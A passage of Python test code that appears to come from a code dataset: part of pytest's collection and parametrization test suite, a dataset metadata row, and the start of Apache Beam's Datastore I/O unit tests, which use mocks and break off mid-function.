@pytest.mark.parametrize('value',
['overridden'])
def test_overridden_via_param(value):
assert value == 'overridden'
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
def test_parametrize_overrides_indirect_dependency_fixture(self, testdir):
"""Test parametrization when parameter overrides a fixture that a test indirectly depends on"""
testdir.makepyfile(
"""
import pytest
fix3_instantiated = False
@pytest.fixture
def fix1(fix2):
return fix2 + '1'
@pytest.fixture
def fix2(fix3):
return fix3 + '2'
@pytest.fixture
def fix3():
global fix3_instantiated
fix3_instantiated = True
return '3'
@pytest.mark.parametrize('fix2', ['2'])
def test_it(fix1):
assert fix1 == '21'
assert not fix3_instantiated
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
@pytest.mark.filterwarnings("ignore:Applying marks directly to parameters")
def test_parametrize_with_mark(self, testdir):
items = testdir.getitems(
"""
import pytest
@pytest.mark.foo
@pytest.mark.parametrize('arg', [
1,
pytest.mark.bar(pytest.mark.baz(2))
])
def test_function(arg):
pass
"""
)
keywords = [item.keywords for item in items]
assert (
"foo" in keywords[0]
and "bar" not in keywords[0]
and "baz" not in keywords[0]
)
assert "foo" in keywords[1] and "bar" in keywords[1] and "baz" in keywords[1]
def test_function_equality_with_callspec(self, testdir, tmpdir):
items = testdir.getitems(
"""
import pytest
@pytest.mark.parametrize('arg', [1,2])
def test_function(arg):
pass
"""
)
assert items[0] != items[1]
assert not (items[0] == items[1])
def test_pyfunc_call(self, testdir):
item = testdir.getitem("def test_func(): raise ValueError")
config = item.config
class MyPlugin1(object):
def pytest_pyfunc_call(self, pyfuncitem):
raise ValueError
class MyPlugin2(object):
def pytest_pyfunc_call(self, pyfuncitem):
return True
config.pluginmanager.register(MyPlugin1())
config.pluginmanager.register(MyPlugin2())
config.hook.pytest_runtest_setup(item=item)
config.hook.pytest_pyfunc_call(pyfuncitem=item)
def test_multiple_parametrize(self, testdir):
modcol = testdir.getmodulecol(
"""
import pytest
@pytest.mark.parametrize('x', [0, 1])
@pytest.mark.parametrize('y', [2, 3])
def test1(x, y):
pass
"""
)
colitems = modcol.collect()
assert colitems[0].name == "test1[2-0]"
assert colitems[1].name == "test1[2-1]"
assert colitems[2].name == "test1[3-0]"
assert colitems[3].name == "test1[3-1]"
def test_issue751_multiple_parametrize_with_ids(self, testdir):
modcol = testdir.getmodulecol(
"""
import pytest
@pytest.mark.parametrize('x', [0], ids=['c'])
@pytest.mark.parametrize('y', [0, 1], ids=['a', 'b'])
class Test(object):
def test1(self, x, y):
pass
def test2(self, x, y):
pass
"""
)
colitems = modcol.collect()[0].collect()[0].collect()
assert colitems[0].name == "test1[a-c]"
assert colitems[1].name == "test1[b-c]"
assert colitems[2].name == "test2[a-c]"
assert colitems[3].name == "test2[b-c]"
def test_parametrize_skipif(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.skipif('True')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_skip_if(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 skipped in *")
def test_parametrize_skip(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.skip('')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_skip(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 skipped in *")
def test_parametrize_skipif_no_skip(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.skipif('False')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_skipif_no_skip(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 1 failed, 2 passed in *")
def test_parametrize_xfail(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.xfail('True')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_xfail(x):
assert x < 2
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 xfailed in *")
def test_parametrize_passed(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.xfail('True')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_xfail(x):
pass
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 2 passed, 1 xpassed in *")
def test_parametrize_xfail_passed(self, testdir, ignore_parametrized_marks_args):
testdir.makepyfile(
"""
import pytest
m = pytest.mark.xfail('False')
@pytest.mark.parametrize('x', [0, 1, m(2)])
def test_passed(x):
pass
"""
)
result = testdir.runpytest(*ignore_parametrized_marks_args)
result.stdout.fnmatch_lines("* 3 passed in *")
def test_function_original_name(self, testdir):
items = testdir.getitems(
"""
import pytest
@pytest.mark.parametrize('arg', [1,2])
def test_func(arg):
pass
"""
)
assert [x.originalname for x in items] == ["test_func", "test_func"]
class TestSorting(object):
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol(
"""
def test_pass(): pass
def test_fail(): assert 0
"""
)
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0 # NOQA
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1, fn2, fn3:
assert fn != 3
assert fn != modcol
assert fn != [1, 2, 3]
assert [1, 2, 3] != fn
assert modcol != fn
def test_allow_sane_sorting_for_decorators(self, testdir):
modcol = testdir.getmodulecol(
"""
def dec(f):
g = lambda: f(2)
g.place_as = f
return g
def test_b(y):
pass
test_b = dec(test_b)
def test_a(y):
pass
test_a = dec(test_a)
"""
)
colitems = modcol.collect()
assert len(colitems) == 2
assert [item.name for item in colitems] == ["test_b", "test_a"]
class TestConftestCustomization(object):
def test_pytest_pycollect_module(self, testdir):
testdir.makeconftest(
"""
import pytest
class MyModule(pytest.Module):
pass
def pytest_pycollect_makemodule(path, parent):
if path.basename == "test_xyz.py":
return MyModule(path, parent)
"""
)
testdir.makepyfile("def test_some(): pass")
testdir.makepyfile(test_xyz="def test_func(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*<Module*test_pytest*", "*<MyModule*xyz*"])
def test_customized_pymakemodule_issue205_subdir(self, testdir):
b = testdir.mkdir("a").mkdir("b")
b.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makemodule():
outcome = yield
mod = outcome.get_result()
mod.obj.hello = "world"
"""
)
)
b.join("test_module.py").write(
textwrap.dedent(
"""\
def test_hello():
assert hello == "world"
"""
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_customized_pymakeitem(self, testdir):
b = testdir.mkdir("a").mkdir("b")
b.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem():
outcome = yield
if outcome.excinfo is None:
result = outcome.get_result()
if result:
for func in result:
func._some123 = "world"
"""
)
)
b.join("test_module.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.fixture()
def obj(request):
return request.node._some123
def test_hello(obj):
assert obj == "world"
"""
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_pytest_pycollect_makeitem(self, testdir):
testdir.makeconftest(
"""
import pytest
class MyFunction(pytest.Function):
pass
def pytest_pycollect_makeitem(collector, name, obj):
if name == "some":
return MyFunction(name, collector)
"""
)
testdir.makepyfile("def some(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*MyFunction*some*"])
def test_makeitem_non_underscore(self, testdir, monkeypatch):
modcol = testdir.getmodulecol("def _hello(): pass")
values = []
monkeypatch.setattr(
pytest.Module, "makeitem", lambda self, name, obj: values.append(name)
)
values = modcol.collect()
assert "_hello" not in values
def test_issue2369_collect_module_fileext(self, testdir):
"""Ensure we can collect files with weird file extensions as Python
modules (#2369)"""
# We'll implement a little finder and loader to import files containing
# Python source code whose file extension is ".narf".
testdir.makeconftest(
"""
import sys, os, imp
from _pytest.python import Module
class Loader(object):
def load_module(self, name):
return imp.load_source(name, name + ".narf")
class Finder(object):
def find_module(self, name, path=None):
if os.path.exists(name + ".narf"):
return Loader()
sys.meta_path.append(Finder())
def pytest_collect_file(path, parent):
if path.ext == ".narf":
return Module(path, parent)"""
)
testdir.makefile(
".narf",
"""\
def test_something():
assert 1 + 1 == 2""",
)
# Use runpytest_subprocess, since we're futzing with sys.meta_path.
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("*1 passed*")
def test_setup_only_available_in_subdir(testdir):
sub1 = testdir.mkpydir("sub1")
sub2 = testdir.mkpydir("sub2")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
def pytest_runtest_setup(item):
assert item.fspath.purebasename == "test_in_sub1"
def pytest_runtest_call(item):
assert item.fspath.purebasename == "test_in_sub1"
def pytest_runtest_teardown(item):
assert item.fspath.purebasename == "test_in_sub1"
"""
)
)
sub2.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
def pytest_runtest_setup(item):
assert item.fspath.purebasename == "test_in_sub2"
def pytest_runtest_call(item):
assert item.fspath.purebasename == "test_in_sub2"
def pytest_runtest_teardown(item):
assert item.fspath.purebasename == "test_in_sub2"
"""
)
)
sub1.join("test_in_sub1.py").write("def test_1(): pass")
sub2.join("test_in_sub2.py").write("def test_2(): pass")
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=2)
def test_modulecol_roundtrip(testdir):
modcol = testdir.getmodulecol("pass", withinit=False)
trail = modcol.nodeid
newcol = modcol.session.perform_collect([trail], genitems=0)[0]
assert modcol.name == newcol.name
class TestTracebackCutting(object):
def test_skip_simple(self):
excinfo = pytest.raises(pytest.skip.Exception, 'pytest.skip("xxx")')
assert excinfo.traceback[-1].frame.code.name == "skip"
assert excinfo.traceback[-1].ishidden()
def test_traceback_argsetup(self, testdir):
testdir.makeconftest(
"""
import pytest
@pytest.fixture
def hello(request):
raise ValueError("xyz")
"""
)
p = testdir.makepyfile("def test(hello): pass")
result = testdir.runpytest(p)
assert result.ret != 0
out = result.stdout.str()
assert "xyz" in out
assert "conftest.py:5: ValueError" in out
numentries = out.count("_ _ _") # separator for traceback entries
assert numentries == 0
result = testdir.runpytest("--fulltrace", p)
out = result.stdout.str()
assert "conftest.py:5: ValueError" in out
numentries = out.count("_ _ _ _") # separator for traceback entries
assert numentries > 3
def test_traceback_error_during_import(self, testdir):
testdir.makepyfile(
"""
x = 1
x = 2
x = 17
asd
"""
)
result = testdir.runpytest()
assert result.ret != 0
out = result.stdout.str()
assert "x = 1" not in out
assert "x = 2" not in out
result.stdout.fnmatch_lines([" *asd*", "E*NameError*"])
result = testdir.runpytest("--fulltrace")
out = result.stdout.str()
assert "x = 1" in out
assert "x = 2" in out
result.stdout.fnmatch_lines([">*asd*", "E*NameError*"])
def test_traceback_filter_error_during_fixture_collection(self, testdir):
"""integration test for issue #995.
"""
testdir.makepyfile(
"""
import pytest
def fail_me(func):
ns = {}
exec('def w(): raise ValueError("fail me")', ns)
return ns['w']
@pytest.fixture(scope='class')
@fail_me
def fail_fixture():
pass
def test_failing_fixture(fail_fixture):
pass
"""
)
result = testdir.runpytest()
assert result.ret != 0
out = result.stdout.str()
assert "INTERNALERROR>" not in out
result.stdout.fnmatch_lines(["*ValueError: fail me*", "* 1 error in *"])
def test_filter_traceback_generated_code(self):
"""test that filter_traceback() works with the fact that
py.code.Code.path attribute might return an str object.
In this case, one of the entries on the traceback was produced by
dynamically generated code.
See: https://bitbucket.org/pytest-dev/py/issues/71
This fixes #995.
"""
from _pytest.python import filter_traceback
try:
ns = {}
exec("def foo(): raise ValueError", ns)
ns["foo"]()
except ValueError:
_, _, tb = sys.exc_info()
tb = _pytest._code.Traceback(tb)
assert isinstance(tb[-1].path, str)
assert not filter_traceback(tb[-1])
def test_filter_traceback_path_no_longer_valid(self, testdir):
"""test that filter_traceback() works with the fact that
py.code.Code.path attribute might return an str object.
In this case, one of the files in the traceback no longer exists.
This fixes #1133.
"""
from _pytest.python import filter_traceback
testdir.syspathinsert()
testdir.makepyfile(
filter_traceback_entry_as_str="""
def foo():
raise ValueError
"""
)
try:
import filter_traceback_entry_as_str
filter_traceback_entry_as_str.foo()
except ValueError:
_, _, tb = sys.exc_info()
testdir.tmpdir.join("filter_traceback_entry_as_str.py").remove()
tb = _pytest._code.Traceback(tb)
assert isinstance(tb[-1].path, str)
assert filter_traceback(tb[-1])
class TestReportInfo(object):
def test_itemreport_reportinfo(self, testdir, linecomp):
testdir.makeconftest(
"""
import pytest
class MyFunction(pytest.Function):
def reportinfo(self):
return "ABCDE", 42, "custom"
def pytest_pycollect_makeitem(collector, name, obj):
if name == "test_func":
return MyFunction(name, parent=collector)
"""
)
item = testdir.getitem("def test_func(): pass")
item.config.pluginmanager.getplugin("runner")
assert item.location == ("ABCDE", 42, "custom")
def test_func_reportinfo(self, testdir):
item = testdir.getitem("def test_func(): pass")
fspath, lineno, modpath = item.reportinfo()
assert fspath == item.fspath
assert lineno == 0
assert modpath == "test_func"
def test_class_reportinfo(self, testdir):
modcol = testdir.getmodulecol(
"""
# lineno 0
class TestClass(object):
def test_hello(self): pass
"""
)
classcol = testdir.collect_by_name(modcol, "TestClass")
fspath, lineno, msg = classcol.reportinfo()
assert fspath == modcol.fspath
assert lineno == 1
assert msg == "TestClass"
@pytest.mark.filterwarnings(
"ignore:usage of Generator.Function is deprecated, please use pytest.Function instead"
)
def test_generator_reportinfo(self, testdir):
modcol = testdir.getmodulecol(
"""
# lineno 0
def test_gen():
def check(x):
assert x
yield check, 3
"""
)
gencol = testdir.collect_by_name(modcol, "test_gen")
fspath, lineno, modpath = gencol.reportinfo()
assert fspath == modcol.fspath
assert lineno == 1
assert modpath == "test_gen"
genitem = gencol.collect()[0]
fspath, lineno, modpath = genitem.reportinfo()
assert fspath == modcol.fspath
assert lineno == 2
assert modpath == "test_gen[0]"
"""
def test_func():
pass
def test_genfunc():
def check(x):
pass
yield check, 3
class TestClass(object):
def test_method(self):
pass
"""
def test_reportinfo_with_nasty_getattr(self, testdir):
# https://github.com/pytest-dev/pytest/issues/1204
modcol = testdir.getmodulecol(
"""
# lineno 0
class TestClass(object):
def __getattr__(self, name):
return "this is not an int"
def test_foo(self):
pass
"""
)
classcol = testdir.collect_by_name(modcol, "TestClass")
instance = classcol.collect()[0]
fspath, lineno, msg = instance.reportinfo()
def test_customized_python_discovery(testdir):
testdir.makeini(
"""
[pytest]
python_files=check_*.py
python_classes=Check
python_functions=check
"""
)
p = testdir.makepyfile(
"""
def check_simple():
pass
class CheckMyApp(object):
def check_meth(self):
pass
"""
)
p2 = p.new(basename=p.basename.replace("test", "check"))
p.move(p2)
result = testdir.runpytest("--collect-only", "-s")
result.stdout.fnmatch_lines(
["*check_customized*", "*check_simple*", "*CheckMyApp*", "*check_meth*"]
)
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines(["*2 passed*"])
def test_customized_python_discovery_functions(testdir):
testdir.makeini(
"""
[pytest]
python_functions=_test
"""
)
testdir.makepyfile(
"""
def _test_underscore():
pass
"""
)
result = testdir.runpytest("--collect-only", "-s")
result.stdout.fnmatch_lines(["*_test_underscore*"])
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collector_attributes(testdir):
testdir.makeconftest(
"""
import pytest
def pytest_pycollect_makeitem(collector):
assert collector.Function == pytest.Function
assert collector.Class == pytest.Class
assert collector.Instance == pytest.Instance
assert collector.Module == pytest.Module
"""
)
testdir.makepyfile(
"""
def test_hello():
pass
"""
)
result = testdir.runpytest(SHOW_PYTEST_WARNINGS_ARG)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_customize_through_attributes(testdir):
testdir.makeconftest(
"""
import pytest
class MyFunction(pytest.Function):
pass
class MyInstance(pytest.Instance):
Function = MyFunction
class MyClass(pytest.Class):
Instance = MyInstance
def pytest_pycollect_makeitem(collector, name, obj):
if name.startswith("MyTestClass"):
return MyClass(name, parent=collector)
"""
)
testdir.makepyfile(
"""
class MyTestClass(object):
def test_hello(self):
pass
"""
)
result = testdir.runpytest("--collect-only", SHOW_PYTEST_WARNINGS_ARG)
result.stdout.fnmatch_lines(["*MyClass*", "*MyFunction*test_hello*"])
def test_unorderable_types(testdir):
testdir.makepyfile(
"""
class TestJoinEmpty(object):
pass
def make_test():
class Test(object):
pass
Test.__name__ = "TestFoo"
return Test
TestFoo = make_test()
"""
)
result = testdir.runpytest()
assert "TypeError" not in result.stdout.str()
assert result.ret == EXIT_NOTESTSCOLLECTED
def test_collect_functools_partial(testdir):
"""
Test that collection of functools.partial object works, and arguments
to the wrapped functions are dealt correctly (see #811).
"""
testdir.makepyfile(
"""
import functools
import pytest
@pytest.fixture
def fix1():
return 'fix1'
@pytest.fixture
def fix2():
return 'fix2'
def check1(i, fix1):
assert i == 2
assert fix1 == 'fix1'
def check2(fix1, i):
assert i == 2
assert fix1 == 'fix1'
def check3(fix1, i, fix2):
assert i == 2
assert fix1 == 'fix1'
assert fix2 == 'fix2'
test_ok_1 = functools.partial(check1, i=2)
test_ok_2 = functools.partial(check1, i=2, fix1='fix1')
test_ok_3 = functools.partial(check1, 2)
test_ok_4 = functools.partial(check2, i=2)
test_ok_5 = functools.partial(check3, i=2)
test_ok_6 = functools.partial(check3, i=2, fix1='fix1')
test_fail_1 = functools.partial(check2, 2)
test_fail_2 = functools.partial(check3, 2)
"""
)
result = testdir.inline_run()
result.assertoutcome(passed=6, failed=2)
@pytest.mark.filterwarnings("default")
def test_dont_collect_non_function_callable(testdir):
"""Test for issue https://github.com/pytest-dev/pytest/issues/331
In this case an INTERNALERROR occurred trying to report the failure of
a test like this one because py test failed to get the source lines.
"""
testdir.makepyfile(
"""
class Oh(object):
def __call__(self):
pass
test_a = Oh()
def test_real():
pass
"""
)
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
[
"*collected 1 item*",
"*test_dont_collect_non_function_callable.py:2: *cannot collect 'test_a' because it is not a function*",
"*1 passed, 1 warnings in *",
]
)
def test_class_injection_does_not_break_collection(testdir):
"""Tests whether injection during collection time will terminate testing.
In this case the error should not occur if the TestClass itself
is modified during collection time, and the original method list
is still used for collection.
"""
testdir.makeconftest(
"""
from test_inject import TestClass
def pytest_generate_tests(metafunc):
TestClass.changed_var = {}
"""
)
testdir.makepyfile(
test_inject='''
class TestClass(object):
def test_injection(self):
"""Test being parametrized."""
pass
'''
)
result = testdir.runpytest()
assert (
"RuntimeError: dictionary changed size during iteration"
not in result.stdout.str()
)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_syntax_error_with_non_ascii_chars(testdir):
"""Fix decoding issue while formatting SyntaxErrors during collection (#578)
"""
testdir.makepyfile(
u"""
# -*- coding: UTF-8 -*-
☃
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*ERROR collecting*", "*SyntaxError*", "*1 error in*"])
def test_skip_duplicates_by_default(testdir):
"""Test for issue https://github.com/pytest-dev/pytest/issues/1609 (#1609)
Ignore duplicate directories.
"""
a = testdir.mkdir("a")
fh = a.join("test_a.py")
fh.write(
textwrap.dedent(
"""\
import pytest
def test_real():
pass
"""
)
)
result = testdir.runpytest(a.strpath, a.strpath)
result.stdout.fnmatch_lines(["*collected 1 item*"])
def test_keep_duplicates(testdir):
"""Test for issue https://github.com/pytest-dev/pytest/issues/1609 (#1609)
Use --keep-duplicates to collect tests from duplicate directories.
"""
a = testdir.mkdir("a")
fh = a.join("test_a.py")
fh.write(
textwrap.dedent(
"""\
import pytest
def test_real():
pass
"""
)
)
result = testdir.runpytest("--keep-duplicates", a.strpath, a.strpath)
result.stdout.fnmatch_lines(["*collected 2 item*"])
def test_package_collection_infinite_recursion(testdir):
testdir.copy_example("collect/package_infinite_recursion")
result = testdir.runpytest()
result.stdout.fnmatch_lines("*1 passed*")
def test_package_collection_init_given_as_argument(testdir):
"""Regression test for #3749"""
p = testdir.copy_example("collect/package_init_given_as_arg")
result = testdir.runpytest(p / "pkg" / "__init__.py")
result.stdout.fnmatch_lines("*1 passed*")
def test_package_with_modules(testdir):
"""
.
└── root
├── __init__.py
├── sub1
│ ├── __init__.py
│ └── sub1_1
│ ├── __init__.py
│ └── test_in_sub1.py
└── sub2
└── test
└── test_in_sub2.py
"""
root = testdir.mkpydir("root")
sub1 = root.mkdir("sub1")
sub1.ensure("__init__.py")
sub1_test = sub1.mkdir("sub1_1")
sub1_test.ensure("__init__.py")
sub2 = root.mkdir("sub2")
sub2_test = sub2.mkdir("sub2")
sub1_test.join("test_in_sub1.py").write("def test_1(): pass")
sub2_test.join("test_in_sub2.py").write("def test_2(): pass")
# Execute from .
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=2)
# Execute from . with one argument "root"
result = testdir.runpytest("-v", "-s", "root")
result.assert_outcomes(passed=2)
# Chdir into package's root and execute with no args
root.chdir()
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=2)
def test_package_ordering(testdir):
"""
.
└── root
├── Test_root.py
├── __init__.py
├── sub1
│ ├── Test_sub1.py
│ └── __init__.py
└── sub2
└── test
└── test_sub2.py
"""
testdir.makeini(
"""
[pytest]
python_files=*.py
"""
)
root = testdir.mkpydir("root")
sub1 = root.mkdir("sub1")
sub1.ensure("__init__.py")
sub2 = root.mkdir("sub2")
sub2_test = sub2.mkdir("sub2")
root.join("Test_root.py").write("def test_1(): pass")
sub1.join("Test_sub1.py").write("def test_2(): pass")
sub2_test.join("test_sub2.py").write("def test_3(): pass")
# Execute from .
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=3)
| mit | -2,220,275,439,364,280,600 | 30.814064 | 116 | 0.530421 | false |
axbaretto/beam | sdks/python/apache_beam/io/gcp/datastore/v1/datastoreio_test.py | 1 | 12457 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
from builtins import map
from builtins import range
from builtins import zip
from mock import MagicMock
from mock import call
from mock import patch
# Protect against environments where datastore library is not available.
# pylint: disable=wrong-import-order, wrong-import-position, ungrouped-imports
try:
from google.cloud.proto.datastore.v1 import datastore_pb2
from apache_beam.io.gcp.datastore.v1 import fake_datastore
from apache_beam.io.gcp.datastore.v1 import helper
from google.cloud.proto.datastore.v1 import query_pb2
from apache_beam.io.gcp.datastore.v1 import query_splitter
from apache_beam.io.gcp.datastore.v1 import util
from apache_beam.io.gcp.datastore.v1.datastoreio import ReadFromDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import WriteToDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import _Mutate
from google.protobuf import timestamp_pb2
from googledatastore import helper as datastore_helper
except (ImportError, TypeError):
datastore_pb2 = None
# pylint: enable=wrong-import-order, wrong-import-position, ungrouped-imports
class DatastoreioTest(unittest.TestCase):
_PROJECT = 'project'
_KIND = 'kind'
_NAMESPACE = 'namespace'
@unittest.skipIf(
sys.version_info[0] == 3,
'v1/datastoreio does not support Python 3 TODO: BEAM-4543')
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
def setUp(self):
self._mock_datastore = MagicMock()
self._query = query_pb2.Query()
self._query.kind.add().name = self._KIND
self._WRITE_BATCH_INITIAL_SIZE = util.WRITE_BATCH_INITIAL_SIZE
def get_timestamp(self):
return timestamp_pb2.Timestamp(seconds=1234)
def test_get_estimated_size_bytes_without_namespace(self):
entity_bytes = 100
timestamp = self.get_timestamp()
self.check_estimated_size_bytes(entity_bytes, timestamp)
def test_get_estimated_size_bytes_with_namespace(self):
entity_bytes = 100
timestamp = self.get_timestamp()
self.check_estimated_size_bytes(entity_bytes, timestamp, self._NAMESPACE)
def test_SplitQueryFn_with_num_splits(self):
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
num_splits = 23
def fake_get_splits(datastore, query, num_splits, partition=None):
return self.split_query(query, num_splits)
with patch.object(query_splitter,
'get_splits',
side_effect=fake_get_splits):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), num_splits)
self.assertEqual(0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_SplitQueryFn_without_num_splits(self):
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
# Force SplitQueryFn to compute the number of query splits
num_splits = 0
expected_num_splits = 23
entity_bytes = (
expected_num_splits * ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)
with patch.object(ReadFromDatastore,
'get_estimated_size_bytes',
return_value=entity_bytes):
def fake_get_splits(datastore, query, num_splits, partition=None):
return self.split_query(query, num_splits)
with patch.object(query_splitter,
'get_splits',
side_effect=fake_get_splits):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), expected_num_splits)
self.assertEqual(
0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_SplitQueryFn_with_query_limit(self):
"""A test that verifies no split is performed when the query has a limit."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
self._query.limit.value = 3
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, 4)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(1, len(returned_split_queries))
self.assertEqual(0, len(self._mock_datastore.method_calls))
def test_SplitQueryFn_with_exception(self):
"""A test that verifies that no split is performed when failures occur."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
# Force SplitQueryFn to compute the number of query splits
num_splits = 0
expected_num_splits = 1
entity_bytes = (
expected_num_splits * ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)
with patch.object(ReadFromDatastore,
'get_estimated_size_bytes',
return_value=entity_bytes):
with patch.object(query_splitter,
'get_splits',
side_effect=ValueError("Testing query split error")):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), expected_num_splits)
self.assertEqual(returned_split_queries[0][1], self._query)
self.assertEqual(
0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_DatastoreWriteFn_with_empty_batch(self):
self.check_DatastoreWriteFn(0)
def test_DatastoreWriteFn_with_one_batch(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 1 - 50
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_multiple_batches(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 3 + 50
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_batch_size_exact_multiple(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 2
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_dynamic_batch_sizes(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 3 + 50
self.check_DatastoreWriteFn(
num_entities_to_write, use_fixed_batch_size=False)
def check_DatastoreWriteFn(self, num_entities, use_fixed_batch_size=True):
"""A helper function to test DatastoreWriteFn."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
entities = [
e.entity for e in fake_datastore.create_entities(num_entities)
]
expected_mutations = list(
map(WriteToDatastore.to_upsert_mutation, entities))
actual_mutations = []
self._mock_datastore.commit.side_effect = (
fake_datastore.create_commit(actual_mutations))
fixed_batch_size = None
if use_fixed_batch_size:
fixed_batch_size = self._WRITE_BATCH_INITIAL_SIZE
datastore_write_fn = _Mutate.DatastoreWriteFn(
self._PROJECT, fixed_batch_size=fixed_batch_size)
datastore_write_fn.start_bundle()
for mutation in expected_mutations:
datastore_write_fn.process(mutation)
datastore_write_fn.finish_bundle()
self.assertEqual(actual_mutations, expected_mutations)
if use_fixed_batch_size:
self.assertEqual(
(num_entities - 1) // self._WRITE_BATCH_INITIAL_SIZE + 1,
self._mock_datastore.commit.call_count)
else:
self._mock_datastore.commit.assert_called()
def test_DatastoreWriteLargeEntities(self):
"""100*100kB entities gets split over two Commit RPCs."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
entities = [e.entity for e in fake_datastore.create_entities(100)]
datastore_write_fn = _Mutate.DatastoreWriteFn(
